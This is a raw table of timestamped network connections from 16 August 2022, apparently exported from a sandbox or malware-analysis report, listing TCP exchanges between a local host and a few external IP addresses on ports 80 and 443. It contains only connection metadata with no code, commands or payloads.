                                        Aug 16, 2022 10:48:41.446990013 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.491206884 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.507807970 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.507915020 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.508354902 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.524935961 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.525768042 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.535489082 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535557032 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535589933 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535626888 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.535631895 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535666943 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.535674095 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535691977 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.535707951 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535720110 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.535739899 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:48:41.535744905 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.535795927 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:48:41.544367075 CEST8049178142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.544538975 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.555094957 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.573375940 CEST8049178142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.587599039 CEST8049178142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.587739944 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.611510992 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.611546040 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.611608028 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.619412899 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.619442940 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.619503975 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.623996973 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.656318903 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.656343937 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.661078930 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661566973 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661634922 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661647081 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661658049 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661679029 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661680937 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661699057 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661703110 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661716938 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661725044 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661742926 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661746979 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661761999 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661768913 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661782026 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661791086 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661803007 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661813974 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.661830902 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.661851883 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.670362949 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.709922075 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.710021973 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.711400032 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.711471081 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.727641106 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.727662086 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.727951050 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:41.728004932 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:41.843106031 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843458891 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843509912 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843532085 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843550920 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843564034 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843607903 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843622923 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843656063 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843667030 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843688011 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843693018 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843740940 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843749046 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843785048 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843795061 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843815088 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843828917 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843847036 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.843858004 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.843892097 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.845758915 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877129078 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877180099 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877199888 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877214909 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877218008 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877244949 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877253056 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877286911 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877288103 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877319098 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877336025 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877351046 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877355099 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877388000 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877405882 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877419949 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877424955 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877463102 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877468109 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877511024 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877520084 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877557039 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877556086 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877599955 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877603054 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877641916 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877645969 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877667904 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877679110 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877715111 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877726078 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877757072 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877772093 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877784967 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877794981 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877810001 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877820969 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877835989 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.877851963 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.877888918 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.885406017 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059011936 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059051991 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059068918 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059078932 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059096098 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059096098 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059102058 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059117079 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059128046 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059133053 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059140921 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059149981 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059166908 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059170008 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059180975 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059196949 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059333086 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059364080 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.059369087 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.059396982 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.063242912 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093019962 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093046904 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093071938 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093086004 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093087912 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093106031 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093108892 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093118906 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093118906 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093151093 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093163013 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093199968 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093215942 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093231916 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093250990 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093262911 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093312979 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093343019 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093348980 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093377113 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093401909 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093439102 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093441963 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093475103 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093480110 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093496084 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093513012 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093528032 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093556881 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093575001 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093594074 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093605995 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093631029 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093647957 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093664885 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093671083 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093677998 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093688011 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093693018 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093708992 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093719959 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093761921 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093779087 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093795061 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093801975 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093810081 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093833923 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093836069 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093871117 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093880892 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.093966007 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.093998909 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094006062 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094014883 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094031096 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094037056 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094049931 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094065905 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094070911 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094088078 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094109058 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094110012 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094120979 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094145060 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094203949 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094233036 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094244003 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094250917 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094266891 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094274044 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094281912 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094309092 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094331026 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.094367981 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.094450951 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.101080894 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.101104021 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.101119995 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.101134062 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.101147890 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.101160049 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.101193905 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.279186964 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.279268980 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.280483961 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.288734913 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.317069054 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317095995 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317118883 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317133904 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317147970 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317157030 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317163944 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317200899 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317217112 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317255020 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317266941 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317279100 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317291021 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317313910 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317336082 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317374945 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317393064 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317415953 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317431927 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317435026 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.317447901 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317466021 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.317658901 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.319031954 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.323971987 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.324040890 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.324042082 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.324054003 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.324095011 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.324106932 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.324151993 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.325010061 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.325056076 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.325063944 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.325109959 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.326385975 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.326431036 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.327003956 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.327049017 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.327498913 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.327629089 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.327637911 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.327678919 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.328767061 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.328824997 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.328831911 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.328881025 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.330102921 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.330161095 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.330169916 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.330224991 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.331326008 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.331382036 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.331393957 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.331442118 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.342196941 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.342269897 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.342282057 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.342334986 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.342586994 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.342637062 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.342647076 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.342691898 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.343929052 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.343987942 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.343996048 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.344049931 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.345118999 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.345192909 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.345200062 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.345248938 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.346534967 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.346584082 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.346592903 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.346654892 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.347673893 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.349006891 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.349061012 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.349070072 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.349081993 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.349117994 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.349123001 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.349163055 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.350200891 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.350250959 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.350261927 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.350298882 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.351504087 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.351566076 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.351573944 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.351613045 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.352740049 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.352792978 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.352801085 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.352835894 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.353930950 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.353979111 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.353990078 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.354024887 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.355154991 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.355195999 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.355211020 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.355245113 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.356497049 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.356544971 CEST49180443192.168.2.22142.250.181.238
